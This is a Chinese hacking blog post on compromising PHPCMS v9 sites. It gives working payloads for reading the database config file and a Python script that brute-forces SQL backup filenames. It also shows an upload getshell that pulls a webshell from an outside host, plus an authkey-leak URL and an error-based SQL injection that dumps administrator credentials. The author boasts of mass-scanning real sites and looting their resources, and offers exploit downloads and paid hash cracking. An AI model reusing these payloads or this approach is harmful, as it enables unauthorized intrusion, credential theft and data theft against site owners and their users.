作者:J0o1ey
原文来自:论如何优雅地拿下PHPCMS
一、PHPCM PHP是国内领先的网站内容管理系统,同时也是一个开源的PHP开发框架,采用PHP5+MYSQL进行开发,拥有非常庞 百度百科介绍其优点主要如下:
①功能强大
②模块化,开源,可扩展功能强大灵活
③支持自定义模型和字段负载能力强,支持千万级数据模板制作方便
④支持中文标签和万能标签进行数据调用拥有门户级的碎片功能,
⑤融入了人性化体验
⑥加强了安全机制
前五条我们无可厚非,因为PHPCMS的开发团队确实比较专业和优秀,但是就算他真的安全机制优秀,难道我们就拿他没办法了嘛?作为一名小学生,自然是不服,让我们今天来盘点一下PHPCMS v9这些年爆出来的常见漏洞~(鸡肋一些的漏洞在此就不介绍了,主要介绍一些比较凶残的)
二、PHPCMS V9本地文件包含漏洞
漏洞出现在如下文件:phpcms/modules/search/index.php
代码如下:
public function public_get_suggest_keyword() { $url = $_GET [ 'url' ]. '&q=' . $_GET [ 'q' ]; $res = @ file_get_contents ( $url ); if (CHARSET != 'gbk' ) { $res = iconv( 'gbk' , CHARSET, $res ); } echo $res ; } |
本处大家会发现在使用file_get_contents函数时没有过滤get方式得到的m参数
因此可以构造payload如下
www.xxx.com/m=search&a=public_get_suggest_keyword&q=../../phpsso_server/caches/configs/database.php
如果存在漏洞即可成功读取到phpcms的数据库配置文件,如图
如果目标的mysql服务对外网开启,则可以使用mysql连接程序直接脱裤
利用用户表的管理员账号密码(phpcms的管理员密码是加盐再md5加密的,需要解密),使用默认后台
www.xxx.com/admin.php]www.xxx.com/admin.php即可成功登录
三、phpcms V9 sql备份文件名爆破
参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=35472&highlight=phpcms
payload:/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/gv5dmx<<.sql
我们知道windows的FindFirstFile(API)有个特性就是可以把<<当成通配符来用
而PHP的opendir(win32readdir.c)就使用了该API。PHP的文件操作函数均调用了opendir,所以file_exists也有此特性。
这个漏洞和前一阵子dedecms后台爆破如出一辙,api.php文件的$op变量决定用户的操作
# api.php <?php define( 'PHPCMS_PATH' , dirname( __FILE__ ).DIRECTORY_SEPARATOR); include PHPCMS_PATH. 'phpcms/base.php' ; ...... $op = isset( $_GET [ 'op' ]) && trim( $_GET [ 'op' ]) ? trim( $_GET [ 'op' ]) : exit ( 'Operation can not be empty' ); ...... if (!preg_match( '/([^a-z_]+)/i' , $op ) && file_exists (PHPCMS_PATH. 'api/' . $op . '.php' )) { include PHPCMS_PATH. 'api/' . $op . '.php' ; ...... ?> |
在/api/creatimg.php文件中,使用了file_exists()函数判断$fontfile文件是否存在,文件存在和不存在的返回信息是不同的,而且$fontfile可以被用户控制,且未过滤.和/等符号,最终导致了漏洞发生。
# /api/creatimg.php <?php defined( 'IN_PHPCMS' ) or exit ( 'No permission resources.' ); $txt = trim( $_GET [ 'txt' ]); if ( extension_loaded ( 'gd' ) && $txt ) { ...... $fontfile = isset( $_GET [ 'font' ]) && ! empty ( $_GET [ 'font' ]) ? $fontpath .trim( $_GET [ 'font' ]) : $fontpath . 'georgia.ttf' ; ...... if ( file_exists ( $fontfile )){ //计算文本写入后的宽度,右下角 X 位置-左下角 X 位置 $image_info = imagettfbbox( $fontsize ,0, $fontfile , $txt ); $imageX = $image_info [2]- $image_info [0]+10; $imageY = $image_info [1]- $image_info [7]+5; ...... |
爆破脚本如下:
#!/usr/bin/env python # coding=utf-8 '' ' /* * author = Mochazz * team = 红日安全团队 * env = pyton3 * */ '' ' import requests import itertools characters = "abcdefghjklmnopqrstuvwxyz0123456789_!#" backup_sql = "" payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<" url = "http://192.168.0.106" flag = 0 for num in range(1,7): if flag: break for pre in itertools.permutations(characters,num): pre = '' .join(list(pre)) payload = payload.format(location=pre) r = requests.get(url+payload) if r.status_code == 200 and "PNG" in r.text: flag = 1 backup_sql = pre payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<" break else : payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<" print ( "[+] 前缀为:" ,backup_sql) flag = 0 for i in range(30): if flag: break for ch in characters: if ch == characters[-1]: flag = 1 break payload = payload.format(location=backup_sql+ch) r = requests.get(url + payload) if r.status_code == 200 and "PNG" in r.text: backup_sql += ch print ( "[+] " ,backup_sql) payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<" break else : payload = "/api.php?op=creatimg&txt=mochazz&font=/../../../../caches/bakup/default/{location}<<" print ( "备份sql文件地址为:" ,backup_sql+ ".sql" ) |
效果如下:
拿到SQL文件后,可以导入本地查看,后续操作这里不多加赘述
四、PHPCMS前台上传getshell
漏洞复现参考(https://www.hackersb.cn/hacker/219.html)
漏洞复现的办法是先打开注册页面:
www.xxx.com/index.php?m=member&c=index&a=register&siteid=1]www.xxx.com/index.php?m=member&c=index&a=register&siteid=
然后向注册页面POST如下payload:
siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://files.hackersb.cn/webshell/antSword-shells/php_assert.php#.jpg>&dosubmit=1&protocol=然后就会报错并返回shell地址:
然后就可以连接啦。
但我在实战测试过程中发现这个漏洞由于危害极大,基本上都已经被运维打补丁了,因此现在存在这个漏洞的站点并不是很多
五、PHPCMS利用authkey泄露进行注入
众所周和PHPCMS在拿到authkey(这边简称key吧),便有一大堆注入,在此给大家简单讲解一下
首先分享一下爆出key的payload
www.xxx.com/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin
<ignore_js_op>
如图中的XI0G8h0TYyWTwZMFIgN9nxHUN9Syymf便是我们所说的key
拿到key后,我们该怎么办呢?
我们这边使用一个名为a.php的exp(exp请回复后下载)
大家可以使用phpstudy安装PHP环境
用法:将a.php丢到phpstudy配置的网站根目录中
访问url:
http://localhost/a.php?url=你要测试的url(不要加http)&key=你得到的key&id=userid=1%20and%20(SELECT%201%20FROM(SELECT%20count(*),concat((SELECT(SELECT%20concat(0x7e,0x27,cast((substring((select+concat(0x7e,0x27,username,0x3a,+password,+0x3a,+encrypt,0x27,0x40,0x7e)+FROM+`v9_admin`+WHERE+1+limit+0,1),1,62))%20as%20char),0x27,0x7e))%20FROM%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20FROM%20information_schema.columns%20group%20by%20x)a)
即可得到后台账号和密码,但是密码是加了salt的,大家可以去
http://cmd.la进行解密,但是是要收费的,你懂得
<ignore_js_op>
然后使用解出的明文密码登录www.xxx.com/admin.php即可~
六、利用fuzz框架批量检测PHPCMS漏洞
我作为一名懒人,叫我一个个地手动检测漏洞是很不现实的,因此我选择使用test404的一款http fuzz框架实现批量检测
简单地编写了一下上述漏洞的插件,采集url进行批量fuzz,效果还是很不错的
如图是使用爆key插件的结果(还有很多了,不一一展示)
这些爆出key的大部分都是存在SQL注入的
有时候还会有福利,搞到个美女图片站什么的,把资源全部打包爽歪歪。。。
至于插件一类的,大家可以阅读原文下载哈~
七、资源下载
阅读原文即可下载:http fuzzer+编写好的插件,利用key注入的exp(exp请把txt扩展名改为php)